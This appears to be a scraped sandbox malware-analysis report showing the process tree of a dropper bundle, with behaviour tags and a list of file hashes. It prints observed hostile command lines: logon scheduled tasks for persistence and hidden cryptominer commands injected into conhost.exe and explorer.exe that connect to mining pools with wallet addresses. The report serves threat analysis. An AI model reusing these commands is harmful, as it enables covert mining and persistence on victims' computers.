C:\Users\Admin\AppData\Local\Temp\is-H5OCM.tmp\{app}\vdi_compiler.exe"C:\Users\Admin\AppData\Local\Temp\is-H5OCM.tmp\{app}\vdi_compiler"11⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8032 -s 29212⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\vpn.exe"C:\Users\Admin\AppData\Local\Temp\vpn.exe" /silent /subid=7209⤵
-
C:\Users\Admin\AppData\Local\Temp\is-B9CRJ.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-B9CRJ.tmp\vpn.tmp" /SL5="$40372,15170975,270336,C:\Users\Admin\AppData\Local\Temp\vpn.exe" /silent /subid=72010⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "11⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090112⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "11⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090112⤵
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall11⤵
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install11⤵
-
C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-2M29F.tmp\stats.tmp"C:\Users\Admin\AppData\Local\Temp\is-2M29F.tmp\stats.tmp" /SL5="$302E2,138429,56832,C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-813RB.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-813RB.tmp\Setup.exe" /Verysilent10⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit11⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'12⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"11⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Services.exe"C:\Users\Admin\AppData\Local\Temp\Services.exe"11⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit12⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'13⤵
- Creates scheduled task(s)
-
C:\Windows\System32\conhost.exeC:\Windows/System32\conhost.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-asia1.nanopool.org:14444 --user=42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s --pass= --cpu-max-threads-hint=60 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri192902b3c24.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSCC2325E3\Fri192902b3c24.exeFri192902b3c24.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4792 -s 3126⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri19d30056588.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSCC2325E3\Fri19d30056588.exeFri19d30056588.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3924 -s 20166⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri19b9b73e83c948b1d.exe /mixone4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSCC2325E3\Fri19b9b73e83c948b1d.exeFri19b9b73e83c948b1d.exe /mixone5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3260 -s 2846⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri1921f7a9d3.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSCC2325E3\Fri1921f7a9d3.exeFri1921f7a9d3.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri192f077acf656dd.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSCC2325E3\Fri192f077acf656dd.exeFri192f077acf656dd.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit7⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'8⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"8⤵
- Executes dropped EXE
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth8⤵
-
C:\Users\Admin\AppData\Local\Temp\1.exe"C:\Users\Admin\AppData\Local\Temp\1.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\3.exe"C:\Users\Admin\AppData\Local\Temp\3.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5288 -s 3008⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\6.exe"C:\Users\Admin\AppData\Local\Temp\6.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5796 -s 16607⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\7.exe"C:\Users\Admin\AppData\Local\Temp\7.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri19870e2febf5544.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSCC2325E3\Fri19870e2febf5544.exeFri19870e2febf5544.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4840 -s 3006⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri19ca03f05489b.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSCC2325E3\Fri19ca03f05489b.exeFri19ca03f05489b.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri19927b4fe38a9d1.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSCC2325E3\Fri19927b4fe38a9d1.exeFri19927b4fe38a9d1.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1404 -s 3166⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv dn8LwwbFRkCXo9mq/8woaw.0.21⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4840 -ip 48401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4792 -ip 47921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 1404 -ip 14041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3260 -ip 32601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 624 -p 5796 -ip 57961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 576 -p 5916 -ip 59161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6060 -s 4603⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3924 -ip 39241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 6060 -ip 60601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5288 -ip 52881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 5212 -ip 52121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 5132 -ip 51321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 5196 -ip 51961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 720 -p 5252 -ip 52521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5804 -ip 58041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 532 -p 1684 -ip 16841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5796 -ip 57961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 7800 -ip 78001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding BC0CBD9F6F7C907DD60F588A672CBAF2 C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 1E58FDDBB393A3BADCCD99A79C653A342⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 39CC93E394D2BA9A1300886C414DCCCE E Global\MSI00002⤵
- Loads dropped DLL
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 4864 -ip 48641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2140 -s 4603⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2140 -ip 21401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 812 -s 4563⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 724 -p 812 -ip 8121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 8032 -ip 80321⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall1⤵
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{1becbc35-b8dc-0540-adce-3d31ab1be056}\oemvista.inf" "9" "4d14a44ff" "0000000000000150" "WinSta0\Default" "0000000000000160" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oem2.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000164" "c173"2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc1⤵
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\1.exeMD5
c1fc20a539360941d7cfcf4f72c8fbee
SHA1fd1acb85f235dc58eae498e8dce26e869e2a6c33
SHA2560610bd7b4126a37bff57b587485c0c5fea530cefeb9cfec84aa571c3da54ea90
SHA512fd6711583fc7e9674cf3a7f5e5f2ed37f725a35723714d8fd336162fea31018e1d00b51ae0ea4c3cda22f07ac4e7daeb71ffb6e67fd864397fb89b1a8a071d06
-
C:\Users\Admin\AppData\Local\Temp\1.exeMD5
c1fc20a539360941d7cfcf4f72c8fbee
SHA1fd1acb85f235dc58eae498e8dce26e869e2a6c33
SHA2560610bd7b4126a37bff57b587485c0c5fea530cefeb9cfec84aa571c3da54ea90
SHA512fd6711583fc7e9674cf3a7f5e5f2ed37f725a35723714d8fd336162fea31018e1d00b51ae0ea4c3cda22f07ac4e7daeb71ffb6e67fd864397fb89b1a8a071d06
-
C:\Users\Admin\AppData\Local\Temp\2.exeMD5
08bb4d3526ca85803f1d70369a25c9ae
SHA142c2cb6886d2c53fd46c51ff1221530a9e12ef80
SHA256fd965711b1ff6f419283f9791177bc3c8c5aaa922e6fe80a5c97b29bea82e3ac
SHA512229be3a81ddc8ca7993a8431fa93cac861de07a5a0485146139c323a7441ed1e78fc38785935d64d5c765bf10b085d1f8908d821700d87f7b0d2a5984fb86884
-
C:\Users\Admin\AppData\Local\Temp\2.exeMD5
08bb4d3526ca85803f1d70369a25c9ae
SHA142c2cb6886d2c53fd46c51ff1221530a9e12ef80
SHA256fd965711b1ff6f419283f9791177bc3c8c5aaa922e6fe80a5c97b29bea82e3ac
SHA512229be3a81ddc8ca7993a8431fa93cac861de07a5a0485146139c323a7441ed1e78fc38785935d64d5c765bf10b085d1f8908d821700d87f7b0d2a5984fb86884
-
C:\Users\Admin\AppData\Local\Temp\3.exeMD5
bccd53a03b5c10bb01ea07774e28e565
SHA11b30911302eb57ae56e9591fd8d45d9fe4a85769
SHA256d75027c6fa953d45659c303978dd292dbf0d9409df7b99ebd63f7362deeafe38
SHA5122210251297c2a17ccd10d8bb8fdbd813ee5424d84aebe8ba8b088cbcdcce46ee82dce8be156e02966e60d9fb5dbc0856d97304950f317dae5b3a103fc29d1cd4
-
C:\Users\Admin\AppData\Local\Temp\3.exeMD5
bccd53a03b5c10bb01ea07774e28e565
SHA11b30911302eb57ae56e9591fd8d45d9fe4a85769
SHA256d75027c6fa953d45659c303978dd292dbf0d9409df7b99ebd63f7362deeafe38
SHA5122210251297c2a17ccd10d8bb8fdbd813ee5424d84aebe8ba8b088cbcdcce46ee82dce8be156e02966e60d9fb5dbc0856d97304950f317dae5b3a103fc29d1cd4
-
C:\Users\Admin\AppData\Local\Temp\4.exeMD5
4e401d22ee5b72e1c6538656d82e5144
SHA155caaab0a376cffa78ea8771d4540b161c6f5b6f
SHA256ed1df1275e9b366f02efaf0e09e2ca94a21c6dfad3d264bb283a2bb5b2cbca75
SHA512c1dc09e838dc65cd64b992c52899e67b5c820a1f244f951403409000941bfcce13eec3b4cf328e3bb1ba669845eff29a6775b7e8374620967ecae4806810d693
-
C:\Users\Admin\AppData\Local\Temp\4.exeMD5
4e401d22ee5b72e1c6538656d82e5144
SHA155caaab0a376cffa78ea8771d4540b161c6f5b6f
SHA256ed1df1275e9b366f02efaf0e09e2ca94a21c6dfad3d264bb283a2bb5b2cbca75
SHA512c1dc09e838dc65cd64b992c52899e67b5c820a1f244f951403409000941bfcce13eec3b4cf328e3bb1ba669845eff29a6775b7e8374620967ecae4806810d693
-
C:\Users\Admin\AppData\Local\Temp\5.exeMD5
b709a5b4f9d210d4db9f0b721faa3499
SHA1e752d7ee243482144958a7afcc68f30a665e1823
SHA256f9617ba5e309553940b7ec01ed9a1bb52fd11e11a8edc437b429d9aff0c02c4f
SHA5120c726f7f492e959637fa97d8b61232544f98acb51158c1e39e9adaed786a23808fc03060f5a4020c0d2f0573fe2ee5ce2637517ca76f10b4d40db2b4b93ae2f1
-
C:\Users\Admin\AppData\Local\Temp\5.exeMD5
b709a5b4f9d210d4db9f0b721faa3499
SHA1e752d7ee243482144958a7afcc68f30a665e1823
SHA256f9617ba5e309553940b7ec01ed9a1bb52fd11e11a8edc437b429d9aff0c02c4f
SHA5120c726f7f492e959637fa97d8b61232544f98acb51158c1e39e9adaed786a23808fc03060f5a4020c0d2f0573fe2ee5ce2637517ca76f10b4d40db2b4b93ae2f1
-
C:\Users\Admin\AppData\Local\Temp\6.exeMD5
f980d94aee51ef842e4ea697f8f65b56
SHA12c2038dc2f49c05f63de2ef8aa96b28dd4e110e2
SHA2569347e1ba195cd6ef282a4c1b540e4c7aeface7b6a443c9379f7e7aa60fc0227d
SHA512895a02b99a32a416ee488e821d1a831cb8853fdccb6d40980ffecd2d040663539d9b660e3b8cce8f988c4bc274eb039f0825e542c0cf0e98bf877867b192c093
-
C:\Users\Admin\AppData\Local\Temp\6.exeMD5
f980d94aee51ef842e4ea697f8f65b56
SHA12c2038dc2f49c05f63de2ef8aa96b28dd4e110e2
SHA2569347e1ba195cd6ef282a4c1b540e4c7aeface7b6a443c9379f7e7aa60fc0227d
SHA512895a02b99a32a416ee488e821d1a831cb8853fdccb6d40980ffecd2d040663539d9b660e3b8cce8f988c4bc274eb039f0825e542c0cf0e98bf877867b192c093
-
C:\Users\Admin\AppData\Local\Temp\7zSCC2325E3\Fri191454c4b4.exeMD5
7c8489d12be3a8b7c8d0a1cec55e2c34
SHA101d47c6e6809392ee6c85f3204d43b4dc5e83544
SHA2566e5c3d18da03948721f6a66c441990b099f5f9abec0ab8a0ebe7aa9b83fad784
SHA51283381a04e2ed42f0098f4d37592811aea0ad37e6fb0d6a5b8ba05563bf51ac229f5626fdc9a63ef3edbd1ef9d30948c8227a139c2abeabf11cdbced01cfc2f64
-
C:\Users\Admin\AppData\Local\Temp\7zSCC2325E3\Fri191454c4b4.exeMD5
7c8489d12be3a8b7c8d0a1cec55e2c34
SHA101d47c6e6809392ee6c85f3204d43b4dc5e83544
SHA2566e5c3d18da03948721f6a66c441990b099f5f9abec0ab8a0ebe7aa9b83fad784
SHA51283381a04e2ed42f0098f4d37592811aea0ad37e6fb0d6a5b8ba05563bf51ac229f5626fdc9a63ef3edbd1ef9d30948c8227a139c2abeabf11cdbced01cfc2f64
-
C:\Users\Admin\AppData\Local\Temp\7zSCC2325E3\Fri1921f7a9d3.exeMD5
a1c7ed2563212e0aba70af8a654962fd
SHA1987e944110921327adaba51d557dbf20dee886d5
SHA256a15773680b31415eeebf20246f283857bda7e7dda16f4674c2cbeba2106e3592
SHA51260d827b6d36d6f3a1b4af445b25f26812043d2be8934c338d29b8a1bbe0b50d8a7c06f54ea14afa1d9dbbc6340c649dc51b0ae12d77329e1fb6fdf99e896a462
-
C:\Users\Admin\AppData\Local\Temp\7zSCC2325E3\Fri1921f7a9d3.exeMD5
a1c7ed2563212e0aba70af8a654962fd
SHA1987e944110921327adaba51d557dbf20dee886d5
SHA256a15773680b31415eeebf20246f283857bda7e7dda16f4674c2cbeba2106e3592
SHA51260d827b6d36d6f3a1b4af445b25f26812043d2be8934c338d29b8a1bbe0b50d8a7c06f54ea14afa1d9dbbc6340c649dc51b0ae12d77329e1fb6fdf99e896a462
-
C:\Users\Admin\AppData\Local\Temp\7zSCC2325E3\Fri192902b3c24.exeMD5
a0105d243e43fe20fcfebfbe7530aaf2
SHA1bfc1be1630bd4177d19c76714c95f48d8ba33c14
SHA256496f67cf5c0907c1799fe892f3ce8c406c9b47256b8bc3d4c68032b4b9f99ea1
SHA512800a968962eec1c17694bbb59ba3faf03c8e5a35a685d3282840c6a9914c71604243eb09ba49ee2b93d60b970ee6797ee5ffcdecbe84bfce59e251517cbad554
-
C:\Users\Admin\AppData\Local\Temp\7zSCC2325E3\Fri192902b3c24.exeMD5
a0105d243e43fe20fcfebfbe7530aaf2
SHA1bfc1be1630bd4177d19c76714c95f48d8ba33c14
SHA256496f67cf5c0907c1799fe892f3ce8c406c9b47256b8bc3d4c68032b4b9f99ea1
SHA512800a968962eec1c17694bbb59ba3faf03c8e5a35a685d3282840c6a9914c71604243eb09ba49ee2b93d60b970ee6797ee5ffcdecbe84bfce59e251517cbad554
-
C:\Users\Admin\AppData\Local\Temp\7zSCC2325E3\Fri192b9eeaa03b.exeMD5
b160ce13f27f1e016b7bfc7a015f686b
SHA1bfb714891d12ffd43875e72908d8b9f4f576ad6e
SHA256fac205247d3b19b5f82f5f4d1269a5c047b6c9ad9f21cc51b4b782c2b08a3b87
SHA5129578fc34807be2541aa7dc26acbe27211e96b42c6c4208afe195b19b08264dfeb3ea7fec637c759f062cbd5561c5140ecd68cd5c79efbb844d3b2639e336ca0c
-
C:\Users\Admin\AppData\Local\Temp\7zSCC2325E3\Fri192b9eeaa03b.exeMD5
b160ce13f27f1e016b7bfc7a015f686b
SHA1bfb714891d12ffd43875e72908d8b9f4f576ad6e
SHA256fac205247d3b19b5f82f5f4d1269a5c047b6c9ad9f21cc51b4b782c2b08a3b87
SHA5129578fc34807be2541aa7dc26acbe27211e96b42c6c4208afe195b19b08264dfeb3ea7fec637c759f062cbd5561c5140ecd68cd5c79efbb844d3b2639e336ca0c
-
C:\Users\Admin\AppData\Local\Temp\7zSCC2325E3\Fri192c305b4a.exeMD5
